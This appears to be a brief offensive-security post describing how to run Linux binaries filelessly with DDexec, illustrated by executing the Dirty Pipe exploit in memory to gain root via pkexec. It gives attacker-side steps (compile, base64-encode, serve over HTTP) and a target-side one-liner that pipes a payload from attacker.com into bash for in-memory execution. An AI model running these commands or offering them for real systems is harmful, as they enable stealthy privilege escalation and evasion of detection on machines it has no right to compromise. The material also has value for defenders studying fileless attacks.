Executing Linux Binaries Without Touching Disk

A technique to run binaries filelessly and stealthily on Linux Without Touching Disk. 138 words.

By Asif Durani

Created Apr 8, 2022
Last Updated Apr 8, 2022

Executing Linux Binaries Without Touching Disk

Limitation

This attack depends on the following tools to work.

dd
bash | zsh | ash (busybox)
setarch | linux64 (busybox)
head
tail
cut
grep
od
readlink
wc
tr
base64
sleep

Example of Running Dirty Pipe exploit in memory without touching the disk to gain root privielges.

Running Dirty Pipe exploit on the target machine without touching the disk. Dirty pip exploit needs a setuid binary we will use /usr/bin/pkexec which is a setuid binary to gain privielge escalation.

In Attacker machine.

# Download & compile the dirty pipe
https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits/blob/main/exploit-2.c
gcc exploit-2.c -o dp-setuid

# Base64 encode the dp-setuid.
base64 -w0 ./dp-setuid > dp-setuid.b64

# Download  DDexec.
https://github.com/arget13/DDexec

# Run http listenor 
python3 -m http.server 80

In Target machine.

# Run the following command
curl attacker.com/dp-setuid.b64 | bash <(curl attacker.com/ddexec.sh) /bin/randomename /usr/bin/pkexec